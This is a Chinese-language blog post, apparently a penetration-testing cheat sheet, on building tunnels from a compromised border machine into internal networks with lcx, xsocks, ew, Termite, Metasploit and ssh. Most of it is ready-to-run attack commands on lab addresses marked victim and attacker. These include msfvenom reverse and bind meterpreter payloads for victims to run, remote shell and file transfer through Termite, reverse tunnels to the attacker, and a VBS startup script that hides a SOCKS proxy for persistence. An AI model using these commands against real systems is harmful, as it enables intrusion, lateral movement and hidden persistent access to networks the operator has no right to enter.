文章目录

网络拓扑
- 拓扑0
- 拓扑1
- 拓扑2
- 拓扑3
端口转发
- lcx.exe/portmap
- - Usage1：本地端口转发
  - Usage2：转发远程端口
- 系统自带
socks代理
- xsocks
- - Usage 1：正向socks代理，防火墙入站规则不严格，连接代理时不会被Block
  - Usage 2：反向socks代理，防火墙入站规则严格，连接代理时会被Block
  - Usage 3：socks服务器重定向，穿透内网中的内网
- sSocks（主要用于Linux系统）
More Powerful
- ew
- - Group1：sSocks相关模块
  - - Usage1：正向代理
    - Usage2：反向代理
  - Group2：lcx相关模块
  - - Usage1：转发本地端口
    - Usage2：正向远程端口转发
    - Usage3：反向远程端口转发
    - Usage4：反向远程端口跳转
  - Group3：综合使用
- Termite
- - Group1：代理管理命令
  - - Usage1：admin端正向连接agent
    - Usage2：agent端正向连接agent
    - Usage3：agent端反向连接agent
  - Group2：代理命令
  - - Usage1：正向端口代理
    - Usage2：反向端口转发
    - Usage3：socks代理
  - Group3：shell
  - Group4：文件操作
  - - Usage1：上传文件
    - Usage2：下载文件
- msf
- - Group1：socks代理
  - Group2：端口转发
  - - Usage1：正向连接
    - Usage2：反向连接
- ssh
- - Group1：正向端口转发（本地代理）
  - - Usage1：机器将一个端口转发到本地另一个端口，用于绕过端口过滤
    - Usage2：远程端口正向隧道到边界机器
    - Usage3：将远程端口正向转发到攻击者主机
  - Group2：反向端口转发（远程代理）
  - - Usage1：边界机器端口反向转发到攻击者
    - Usage2：边界机器将远程机器端口反向转发到攻击者
  - Group3：socks代理
  - - Usage1：正向socks
    - Usage2：反向 socks
低权限（Webshell权限）代理及转发工具
- Tunna
- reGeorg
- reDuh
- HTTPTunnel
- ABPTTS
总结

在进入内网之后我们要做的第一件事就是通过端口转发与边界代理在我们的机器与内网机器之间建立通信通道为我们后续的内网渗透打下基础。前提是拿到边界机器的一定权限！

下文中所有用到的工具地址
本文主要以转发3389端口为例，当然Linux系统中3389端口并不是远程桌面下述如果提及仅是举个例子而已！端口转发只转发特定端口而socks代理则相当于对所有的端口进行了转发

网络拓扑

拓扑0

拓扑1

拓扑2

拓扑3

端口转发

lcx.exe/portmap

Usage1：本地端口转发

拓扑0
系统
命令

#受害者机器（IP:192.168.255.145）## Windows./lcx.exe -tran 3389 4444##Linuxportmap  -m 2 3389 4444
# 攻击者机器（IP:192.168.255.137）## Linuxrdesktop 192.168.255.145:4444## Windowmstsc.exe

Usage2：转发远程端口

拓扑1
系统
命令

#受害者机器（IP:10.0.0.4）## Windows./lcx.exe -slave 192.168.255.137 4444 10.0.0.4 3389## Linux./portmap  -m 3 -h1 192.168.255.137 -p1 4444 -h2 10.0.0.4 -p2 3389
# 攻击者机器（IP:192.168.255.137）## Linuxrdesktop 127.0.0.1:4444## Windowmstsc.exe

系统自带

沿用上述拓扑
各机器终端命令
命令

# 边界机器（IP:192.168.255.145）## Linuxecho '1' > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -d 192.168.255.145 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.4:3389##Windowsnetsh interface ipv6 install #（不过在Windows XP/2003中使用上述命令时首先要使用如下命令安装IPv6扩展）netsh interface portproxy set v4tov4 listenaddress=127.0.0.1  listenport=3333 connectaddress=10.0.0.4 connectport=3389netsh interface portproxy show all
# 攻击者机器（IP:192.168.255.137）## Linuxrdesktop 192.168.255.145:3389## Windowmstsc.exe

socks代理

xsocks

Usage 1：正向socks代理，防火墙入站规则不严格，连接代理时不会被Block

沿用上述拓扑
各机器终端命令
3. 命令

#边界机器（IP:192.168.255.145）## Linux./xsocks  -l 1080## Windowsxsocks.exe -l 1080
#攻击者机器（IP:192.168.255.137）## Linuxvi /etc/proxychains.conf #(修改最后一行为socks5 边界机器IP 1080)proxychains bashrdesktop 10.0.0.4:3389## Windowproxifier.exe  #(添加mstsc.exe规则)

Usage 2：反向socks代理，防火墙入站规则严格，连接代理时会被Block

沿用上述拓扑
各机器终端命令
3. 命令

#攻击者机器（IP:192.168.255.137）## Linux./xsocks -t  -p1 1088 -p2 1080  #注意端口顺序，顺序不对容易失败## Windowsxsocks.exe  -t  -p1 1088 -p2 1080  #注意端口顺序，顺序不对容易失败
#边界机器（IP:192.168.255.145）## Linux./xsocks -r 10.0.0.1:1088## Windowsxsocks.exe -r 10.0.0.1:1088
#攻击者机器（IP:192.168.255.137）## linuxvi /etc/proxychains.conf #(修改最后一行为socks5 127.0.0.1 1080)proxychains bashrdesktop 10.0.0.4:3389## windowproxifier.exe  #(添加mstsc.exe规则)

Usage 3：socks服务器重定向，穿透内网中的内网

网络拓扑如下所示：
各机器终端命令
3. 命令

#边界机器2（IP:10.0.2.129）## Linux./xsocks -l 1080## Windowsxsocks.exe -l 1080
#攻击者机器（IP:192.168.255.137）## Linux./xsocks -t  -p1 1088 -p2 1080  #注意端口顺序，顺序不对容易失败## Windowsxsocks.exe  -t  -p1 1088 -p2 1080  #注意端口顺序，顺序不对容易失败
#边境机器1（IP:192.168.255.145）## Linux./xsocks -s 10.0.0.4:1080 -r  192.168.255.137:1088## Windowsxsocks.exe -s 10.0.0.4:1080 -r  192.168.255.137:1088
#攻击者机器（IP:192.168.255.137）## linuxvi /etc/proxychains.conf #(修改最后一行为socks5 127.0.0.1 1080)proxychains bashrdesktop 10.0.2.128:3389## windowproxifier.exe  #(添加mstsc.exe规则)

sSocks（主要用于Linux系统）

此工具功能和xsocks类似，但是我在尝试使用此工具时出现错误为此还是用xsocks吧

More Powerful

ew

可以说ew是lcx及sSocks的结合体，它综合了两者的特性，其中sScoks相关的模块主要用于开启正反向socks代理服务，lcx相关模块主要用于将例如socks等基于TCP的服务转发到内网边界。

Group1：sSocks相关模块

Usage1：正向代理

拓扑1
各机器终端命令
3. 命令

#边界机器（IP:192.168.255.145）## Linux./ew -s ssocksd -l 1080## Windowsew.exe -s ssocked -l 1080
#攻击者机器（IP:192.168.255.137）## Linuxvi /etc/proxychains.conf #(修改最后一行为socks5 边界机器IP 1080)proxychains bashrdesktop 10.0.0.4:3389## Windowproxifier.exe  #(添加mstsc.exe规则)

Usage2：反向代理

拓扑1
各机器终端命令
命令

#攻击者机器（IP:192.168.255.137）## Linux./ew -s rcsocks  -l 1080 -e 1088## Windowsew.exe  -s rcsocks  -l 1080 -e 1088
#边界机器（IP:192.168.255.145）## Linux./ew -s rssocks -d 192.168.255.137 -e 1088## Windowsew.exe -s rssocks -d 192.168.255.137 -e 1088
#攻击者机器（IP:192.168.255.137）## linuxvi /etc/proxychains.conf #(修改最后一行为socks5 127.0.0.1 1080)proxychains bashrdesktop 10.0.0.4:3389## windowproxifier.exe  #(添加mstsc.exe规则)

Group2：lcx相关模块

Usage1：转发本地端口

拓扑0
各机器终端命令
命令

#受害者机器（IP:192.168.255.145）## Linux./ew -s lcx_tran -l 4444 -f 127.0.0.1 -g 3389## Windowsew.exe -s lcx_tran -l 4444 -f 127.0.0.1 -g 3389
#攻击者机器（IP:192.168.255.137）## Linuxrdesktop 192.168.255.145:4444## Windowmstsc.exe

Usage2：正向远程端口转发

拓扑0
各机器终端命令
命令

#攻击者机器（IP:192.168.255.137）## Linux./ew -s lcx_tran -l 4444 -f 192.168.255.145 -g 3389rdesktop 192.168.255.145:4444## Windowsew.exe -s lcx_tran -l 4444 -f 192.168.255.145 -g 3389mstsc.exe

Usage3：反向远程端口转发

拓扑0
各机器终端命令
命令

#攻击者机器（IP:192.168.255.137）## Linux./ew -s lcx_listen -l 3389 -e 4444## Windowsew.exe -s lcx_slave -l 4444 -f 192.168.255.145 -g 3389
#受害者机器（IP:192.168.255.145）## Linux./ew -s lcx_slave -d 192.168.255.137 -e 4444 -f 127.0.0.1 -g 3389## Windowsew.exe -s lcx_slave -d 192.168.255.137 -e 4444 -f 127.0.0.1 -g 3389
#攻击者机器（IP:192.168.255.137）## Linuxrdesktop 127.0.0.1:3389## Windowsmstsc.exe

Usage4：反向远程端口跳转

拓扑1
各机器终端命令
命令

#攻击者机器（IP:192.168.255.137）## Linux./ew -s lcx_listen -l 3389 -e 4444## Windowsew.exe -s  lcx_listen -l 3389 -e 4444
#边界机器（IP:192.168.255.145）## Linux./ew -s lcx_slave -d 192.168.255.137 -e 4444 -f 10.0.0.4 -g 3389## Windowsew.exe -s lcx_slave -l 4444 -d 192.168.255.137 -e 4444 -f 10.0.0.4 -g 3389
#攻击者机器（IP:192.168.255.137）## Linuxrdesktop 127.0.0.1:4444## Windowsmstsc.exe

Group3：综合使用

综合的使用sSocks及lcx两个功能模块效果更佳：》，这里只举一个例子

拓扑2
各机器终端命令
命令

#边界机器2（IP:10.0.2.129）## Linux./ew  -s ssocksd -l 1080## Windowsew.exe  -s ssocksd -l 1080
#攻击者机器（IP:192.168.255.137）## Linux./ew -s lcx_listen -l 1080 -e 4444## Windowsew.exe  -s lcx_listen -l 1080 -e 4444
#边境机器1（IP:192.168.255.145）## Linux./ew -s lcx_slave -d 192.168.255.137 -e 4444 -f 10.0.0.4 -g 1080## Windowsew -s lcx_slave -d 192.168.255.137 -e 4444 -f 10.0.0.4 -g 1080
#攻击者机器（IP:192.168.255.137）## linuxvi /etc/proxychains.conf #(修改最后一行为socks5 127.0.0.1 1080)proxychains bashrdesktop 10.0.2.128:3389## windowproxifier.exe  #(添加mstsc.exe规则)

Termite

Termite是后渗透主机管理工具代理及端口转发仅是其附属功能

Group1：代理管理命令

Termite管理代理机器的模式如上图所示即管理者通过admin端正向连接到agent端，各agent端之间可以通过正向连接和反向连接两种方式互相连接。

Usage1：admin端正向连接agent

拓扑1
各机器终端命令
命令

#边界机器1（IP:192.168.255.145）## Linux./agent -l 4444## Windowsagent.exe -l 4444
#攻击者机器（IP:192.168.255.137）## Linux./admin -c 192.168.255.145 -p 4444## Windowsadmin.exxe -c 192.168.255.145 -p 4444

Usage2：agent端正向连接agent

在Usage1基础上

拓扑1
各机器终端命令
命令

#边界机器2（IP:10.0.0.4）## Linux./agent -l 4444## Windowsagent.exe -l 4444
#攻击者机器（IP:192.168.255.137）goto 1connect 10.0.0.4 4444

Usage3：agent端反向连接agent

在Usage1的基础上

拓扑1
各机器终端命令
命令

#攻击者机器（IP:192.168.255.137）goto 1listen 4444 #（上述命令可选，在Usage1情况下不执行此条命令，只有通过反向连接到其他代理的代理机器想要其他机器进行反向连接时需要使用此命令）
#边界机器2（IP:10.0.0.4）## Linux./agent -c  10.0.0.2 -p 4444## Windowsagent.exe -c 10.0.0.2 -p 4444

无论通过什么方式在各机器之间建立连接，连接建立后通道均相同。

Group2：代理命令

本节操作基于上节操作

Usage1：正向端口代理

拓扑1
各机器终端命令
命令

#边界机器2（IP:10.0.0.4）## Linuxnc -lvp 6666## Windowsnc.exe -lvp 6666
#攻击者机器（IP:192.168.255.137）goto 1    #(goto到任意代理机器都可以)lcxtran 6666 10.0.0.4 6666## Linuxnc 127.0.0.1 6666## Windowsnc.exe 127.0.0.1 6666

正向端口代理存在建立速度慢，3389转发异常（如下图所示）两个缺点，优点是转发端口对应的服务程序关闭后隧道仍然存在比如上述中nc关闭后再重新打开还是可以继续通信，并且可以多跳代理。

Usage2：反向端口转发

Termite实现的反向端口转发和其他的反向端口转发不一样，这里是正的反向端口转发，服务提供者竟然是攻击者。。。不知道作者是故意设计的这个功能还是理解错了反向端口转发这个意思，还是我理解错了这个功能。。。作者对于此功能的简要解释如下：

[20180814] ( Free 1.8 ) 增加反向隧道的功能(backtran指令，是lcxtran的镜像操作)，将本地可达的一个地址端口，映射至agent的一个指定端口，在后渗透测试中可以用于构造反弹木马的上线隧道，或反向访问本地可达的任意TCP服务。

拓扑1
各机器终端命令
命令

#攻击者机器（IP:192.168.255.137）goto 2  #(注意需要goto到反向代理的机器而不是跳板机，可以隔多跳)backtran 7777 192.168.255.137 7777## Linuxnc -lvp 7777## Windowsnc.exe  -lvp 7777
#边界机器2（IP:10.0.0.4）## Linuxnc 127.0.0.1 7777## Windowsnc.exe 127.0.0.1 7777

Usage3：socks代理

个人人为socks代理还是比较好用的，在想提供socks服务的代理机器上直接执行socks执行就可以通过本地相应端口访问提供服务的代理机器所处的内网环境。

拓扑2
各机器终端命令
命令

# 攻击者机器（IP：192.168.255.137）
goto 2
socks 1080## linuxvi /etc/proxychains.conf #(修改最后一行为socks5 127.0.0.1 1080)proxychains bashrdesktop 10.0.2.128:3389## windowproxifier.exe  #(添加mstsc.exe规则)

Group3：shell

拓扑2
各机器终端命令
命令

# 攻击者机器（IP：192.168.255.137）
goto 3
shell 6666## linuxnc 127.0.0.1 6666## windownc.exe 127.0.0.1 6666

支持重连即nc关闭后从新连接相应端口shell还在

Group4：文件操作

Usage1：上传文件

拓扑1
各机器终端命令
命令

# 攻击者机器（IP：192.168.255.137）
goto 2
upfile test test.txt

Usage2：下载文件

拓扑1
各机器终端命令
命令

# 攻击者机器（IP：192.168.255.137）
goto 2
downfile agent_win32.exe test.exe

其实总的来说还是不太稳定啊！如果开放源码就好了：<

msf

Group1：socks代理

拓扑2
各机器终端命令
命令

# 攻击者机器（IP：192.168.255.137）msfvenom -platform windows -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.255.137 lport=4444 -f exe -o test.exemsfvenom -platform windows -a x86 -p windows/meterpreter/bind_tcp lhost=10.0.0.4 lport=4444 -f exe -o test1.exe#（这里为了方便直接使用msfvenom生成payload在受害者机器执行， 第一个payload是反向TCP为边界机器1准备，第二个payload是为边界机器2准备的，由于边界机器2无法反向连接攻击者主机所以只能选择bind_tcp即等待正向连接的payload）msfconsole#(进msfconsole)use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.255.137set lport 4444run
# 边界机器1（IP：192.168.255.145）点击test.exe
# 边界机器2（IP：10.0.0.4）点击test1.exe
# 攻击者机器（IP：192.168.255.137）#(进入meterpreter)run get_local_subnets #（查看此跳板机所连接的各个子网）run post/multi/manage/autoroute #（这条命令很重要是为msf建立路由，注意是msf路由即msf这个框架中使用的路由与主机路由没有关系，后期的socks代理端口代理及其他模块的使用都会使用到msf框架路由）backgroundset payload windows/meterpreter/bind_tcpset rhost 10.0.0.4set lport 4444run #(进入meterpreter)run get_local_subnetsrun post/multi/manage/autoroutebackgroundbackuse auxilary/server/socks4aset srvhost 127.0.0.1exploit -j## linux#（在新终端中）vi /etc/proxychains.conf #(修改最后一行为socks4 127.0.0.1 1080)proxychains bashrdesktop 10.0.0.4:3389CTRL+Crdesktop 10.0.2.128:3389## windowproxifier.exe  #(添加mstsc.exe规则)

Group2：端口转发

Usage1：正向连接

拓扑2
各机器终端命令
命令

# 攻击者机器（IP：192.168.255.137）#(msfconsole上下文)sessions -i 1portfwd add -l 3389 -r 10.0.0.4 -p 3389rdesktop 127.0.0.1:3389

建立10.0.2.128的3389端口转发时不成功，并且建立后隧道不可复用即断开后重新连接转发端口连接不成功后台服务消失，并且删除原来的隧道重新建立新的隧道也不成功：<

Usage2：反向连接

使用reverse_tcp这个payload时并未复现成功，问题如下。不是很鲁棒：< ！！！

meterpreter > portfwd add -R -L 192.168.255.145 -l 5555 -p 6666
[-] Failed to create relay: A socket error occurred.
meterpreter > portfwd flush

但是观察攻击者主机的tcp连接建立情况可以推测出是运行于目标主机reverse_tcp这个payload的问题换一个payload试试，嗯确实成功不了：《

ssh

隧道建立命令：
ssh 选项 IP1:PORT1:IP2:PORT2 username@IP3

选项介绍：

-R 反向隧道。默认情况下，-g选项及IP1指定在-R上下文中无效，远端仅绑定回环地址。需要将/etc/ssh/sshd_config配置文件中的GatewayPorts选项设置为True才可以对远端地址进行绑定。
-L 正向隧道
-g 开启网关功能即目标主机的所有网卡都会监听PORT1端口此时不用指定IP1即可，
-N 创建隧道时不打开IP3的shell
-f 后台运行隧道，与-N连用
-C 压缩传输数据，会降低速度
-q 安静模式
-n 禁止隧道从stdin读入数据（其实就是讲stdin重定向到了/dev/null）
-T 禁止开启伪终端

参数介绍

	IP1	IP2	IP3	执行者
正向	目标主机	远程主机（相对于跳板机）	跳板机	目标主机
反向	目标主机	远程主机（相对于跳板机）	目标主机	跳板机

这里远程主机指得是提供服务的机器比如提供rdp（3389）服务的机器，目标主机代表的远程主机端口要转发到的主机。
正反向隧道建立过程中根据目标主机、远程主机及目标主机这三者随机组合（即是这三者哪些是在同一台机器上）及命令执行者不同可以出现如下图的几种情况

Group1：正向端口转发（本地代理）

ssh通过ssh隧道提供的端口转发及socks代理与上述提到的工具不同。

Usage1：机器将一个端口转发到本地另一个端口，用于绕过端口过滤

目标主机、远程主机、跳板机为同一台机器

拓扑3
各机器终端命令
命令

# 边界机器（IP：192.168.255.143）## linuxnc -lvp 3389## windownc.exe -lvp 3389 ssh -CfNg -L 4444:127.0.0.1:3389 domain_ubuntu@127.0.0.1输入密码
# 攻击者机器（IP：192.168.255.137）## linuxnc 127.0.0.1 4444## windownc.exe 127.0.0.1 4444

Usage2：远程端口正向隧道到边界机器

仅目标主机、跳板机为相同机器，即命令执行者是IP3机器

拓扑3
各机器终端命令
命令

# 边界机器（IP：192.168.255.143）ssh -CfNg -L 5555:10.0.0.4:3389 domain_ubuntu@127.0.0.1输入密码
# 攻击者机器（IP：192.168.255.137）## linuxrdesktop 192.168.255.143:5555## windowproxifier.exe  #(添加mstsc.exe规则)

Usage3：将远程端口正向转发到攻击者主机

目标主机、跳板机，远程主机为不同机器，即命令执行者是IP1

拓扑3
各机器终端命令
命令

# 攻击者机器（IP：192.168.255.137）ssh -CfNg -L 5555:10.0.0.4:3389 domain_ubuntu@192.168.255.143输入密码## linuxrdesktop 127.0.0.1:5555## windowmstsc.exe

Group2：反向端口转发（远程代理）

此例中反向连接攻击主机时（kali）出现Permission denied, please try again.的问题，只需要在/etc/ssh/sshd_config中添加PermitRootLogin no即可。

Usage1：边界机器端口反向转发到攻击者

仅跳板机，远程主机为相同机器

拓扑3
各机器终端命令
命令

# 边界机器（IP：192.168.255.143）## linuxnc -lvp 5555## windownc.exe -lvp 5555 ssh -qCfNg -R 8888:127.0.0.1:5555 root@192.168.255.137输入密码
# 攻击者机器（IP：192.168.255.137）## linuxnc 127.0.0.1 8888## windownc.exe 127.0.0.1 8888

Usage2：边界机器将远程机器端口反向转发到攻击者

目标主机、跳板机，远程主机为不同机器

拓扑3
各机器终端命令
命令

# 边界机器（IP：192.168.255.143）ssh -qCfNg -R 3389:10.0.0.4:3389 root@192.168.255.137输入密码
# 攻击者机器（IP：192.168.255.137）## linuxrdesktop 127.0.0.1:3389## windowmstsc.exe

Group3：socks代理

Usage1：正向socks

拓扑3
各机器终端命令
命令

# 攻击者机器（IP：192.168.255.137）ssh -fNg -D 1080 root@192.168.255.143## linuxvi /etc/proxychains.conf #(修改最后一行为socks5 127.0.0.1 1080)proxychains bashrdesktop 10.0.0.4:3389## windowproxifier.exe  #(添加mstsc.exe规则)

Usage2：反向 socks

拓扑3
各机器终端命令
命令

# 边界机器（IP：192.168.255.143）ssh -fNg -R 1080 root@192.168.255.137
# 攻击者机器（IP：192.168.255.137）## linuxvi /etc/proxychains.conf #(修改最后一行为socks5 127.0.0.1 1080)proxychains bashrdesktop 10.0.0.4:3389## windowproxifier.exe  #(添加mstsc.exe规则)

低权限（Webshell权限）代理及转发工具

有时在进行渗透测试过程中你只可以获得低权限的shell比如你只可以上传Webshell，由于此时你接触不到系统的shell（cmd，bash等）那么上述所提工具就没法使用，不过总是有对策的不是！下面三款工具允许在攻击者在低权限情况下进行端口转发，由于这些工具通过复用http隧道进行转发或代理还具有一定的过防火墙功能。

总结

当然上述直接在边界机器执行带窗口的xsocks好像不太好我们可以通过VBS代码隐藏窗口，例如下述代码。把下述代码保存为vbs文件并置于机器的开机启动目录中，比如window7启动目录为C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup，但是不同版本开机启动目录不同，文件夹中可以使目标机器开机即启动

Dim WH
set WH = CreateObject("Wscript.shell")
WH.Run "xsocks.exe -l 1080",0,false

在上述众多情况中如果内网可以访问外网的话可以直接使用攻击主机代替边界机器。
上述工具中反向代理的命令形式都非常接近都需要在攻击端开启一个本地端口环路。
socks代理是单向的即使用代理的机器可以主动连接到被代理内网内的机器但这些内网机器无法主动连接使用代理的机器。
socks代理还是比端口转发好用一些
端口转发工具还是lcx及ew的lcx模块更加好用并且稳定一些
上述实现了socks代理的工具所提供的socks代理服务都还比较稳定
上述介绍的端口转发都是本机的回环回环通过服务程序与远程会话结合的过程（没时间画图了，这一片博客写死个人：>）
Termite反向端口转发出现打破了我对反向端口转发认知，或者说Termite实现的反向端口转发是否可以称之为反向端口转发功能
其实上述工具别人都有介绍过，那么自己耗费了这么长时间重新写一遍有意义吗？我感觉当然有啦最起码实际应用了上述工具，了解了各工具的特性，可以抽象出各工具的工作原理，熟悉了网络环境，掌握了几乎所有现有的内网转发工具，为自己的工具开发提供灵感

渗透测试之通道构建Cheat Sheet相关推荐

Nmap Cheat Sheet Part 1
译者:未知原文:Nmap Cheat Sheet: From Discovery to Exploits – Part 1: Introduction to Nmap 在侦查期间,扫描一直是信息收集 ...
139.00.007 Git学习-Cheat Sheet
@(139 - Environment Settings | 环境配置) Git虽然极其强大,命令繁多,但常用的就那么十来个,掌握好这十几个常用命令,你已经可以得心应手地使用Git了. 友情附赠国外网 ...
mysql 递归_「MySQL」 - SQL Cheat Sheet - 未完成
近几个月的心情真是安排的妥妥的,呈现W状.多的不说了,这里对SQL的测试进行简单梳理,制作一份SQL Cheat Sheet. 0x01.数据库基本架构 Clinet层 Server层连接器网络连 ...
tomcat temp 大量 upload 文件_渗透测试之文件上传漏洞总结
文末下载上传环境源码客户端 js检查一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式. 查看源代码可以看到有如下代码对上传文件类型进行了限制: 我们 ...
ubuntu cheat sheet 目录结构
Ubuntu Cheat Sheet Ubuntu系统目录结构以下为Ubuntu目录的主要目录结构,您稍微了解它们都包含了哪些文件就可以了,不需要记忆. / 根目录 │ ├boot/ 启动文件.所 ...
容器编排技术 -- kubectl Cheat Sheet
容器编排技术 -- kubectl Cheat Sheet 1 Kubectl 自动补全 2 Kubectl 上下文和配置 3 创建对象 4 显示和查找资源 5 更新资源 6 修补资源 7 编辑资源 ...
Emmet Cheat Sheet（Sublime编辑）
快捷创建html标签官网的Emmet Cheat Sheet :http://docs.emmet.io/cheat-sheet/ https://files.cnblogs.com/files/t ...
XSS Cheat Sheet
XSS Cheat Sheet XSS 101 <h1>Hello,<script>alert(1)</script>!</h1> 1. With &l ...
Tmux Cheat Sheet
Tmux Cheat Sheet 文章目录 Tmux Cheat Sheet 1. Sessions 2. Windows(个人不常用) 3. Panes 4. Tips 5. 配置文件:`.tmux ...
Cheat sheet FOR Python Packages
Cheat sheet FOR Python Packages Pyspark Pandas And SO ON

渗透测试之通道构建Cheat Sheet